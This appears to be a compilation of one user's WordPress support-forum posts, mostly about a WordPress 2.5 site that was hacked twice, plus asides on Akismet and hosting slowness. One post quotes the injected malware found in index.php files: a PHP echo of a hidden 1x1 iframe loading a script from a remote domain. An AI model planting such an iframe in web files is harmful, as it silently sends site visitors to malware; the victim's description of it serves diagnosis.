muskogeerabbit

In my case all php files has iframe code placed at the end of the file redirecting to another site. It was very easy to tell it was hacked. You could also see the transfer taking place by looking at the urls being displayed in the bottom of the browser.

Well, I am at a loss. After the last two hacks, I still don’t have a clue as to how they got in. Permissions are correct on my libraries. I only use two plugins. 1) Bad Behavior and 2) WordPress Database Backup.

If my Permissions are set to 755 then a hacker should not be able to write to my directories unless the have access to my root segment as a user.

There seems to be a lot of recent complaints about hacks and many by the same redirect. Are we sure that this isn’t a flaw in 2.5. The last time I was hacked was three years ago under a much earlier release of WP.

Within a week of installing 2.5 I was hacked. I re installed (having removed the infected modules) and within another week I was hacked again.

So the answer is that it is unsecured but the odds are that no one will do it. Why not just secure the Admin functions and not leave it to chance?

Aha. That displays different in the post than what it looked like. That is the problem!

I have the originial files for WP 2.5 and uploaded them to my host site. However, these two files are requested to be left alone during an upgrade and that is why I am asking the question.

I downloaded these from my host to see what they looked like and bothe containe something like the following:

<iframe src=”http://cdpuvbhfzz.com/dl/adv598.php” width=1 height=1></iframe>’; ?><?php echo ‘<iframe src=”http://cdpuvbhfzz.com/dl/adv598.php” width=1 height=1></iframe>’; ?>

As with my question above, would the same iframe statement be in wp-config.php?

Can anyone tell me if it is normal for the index.php module, in wp-content, to contain an iframe statement when a site is up and running? I know it doesn’t in the initial library. In other words, does WordPress use iframe itself?

Hi Sabinou. I will try what you suggest. My ,htaccess has not been touched, but I don’t think my host used that any more. I remember they made a change to avoid using .htaccess

Same problem with me and the spam count never gets higher than 9299

My AKISMET spam has stopped automatically taking spam and the count is stuck at 9299.

Slowness was a host problem. I think they have it fixed. Your solution fixed the page problem.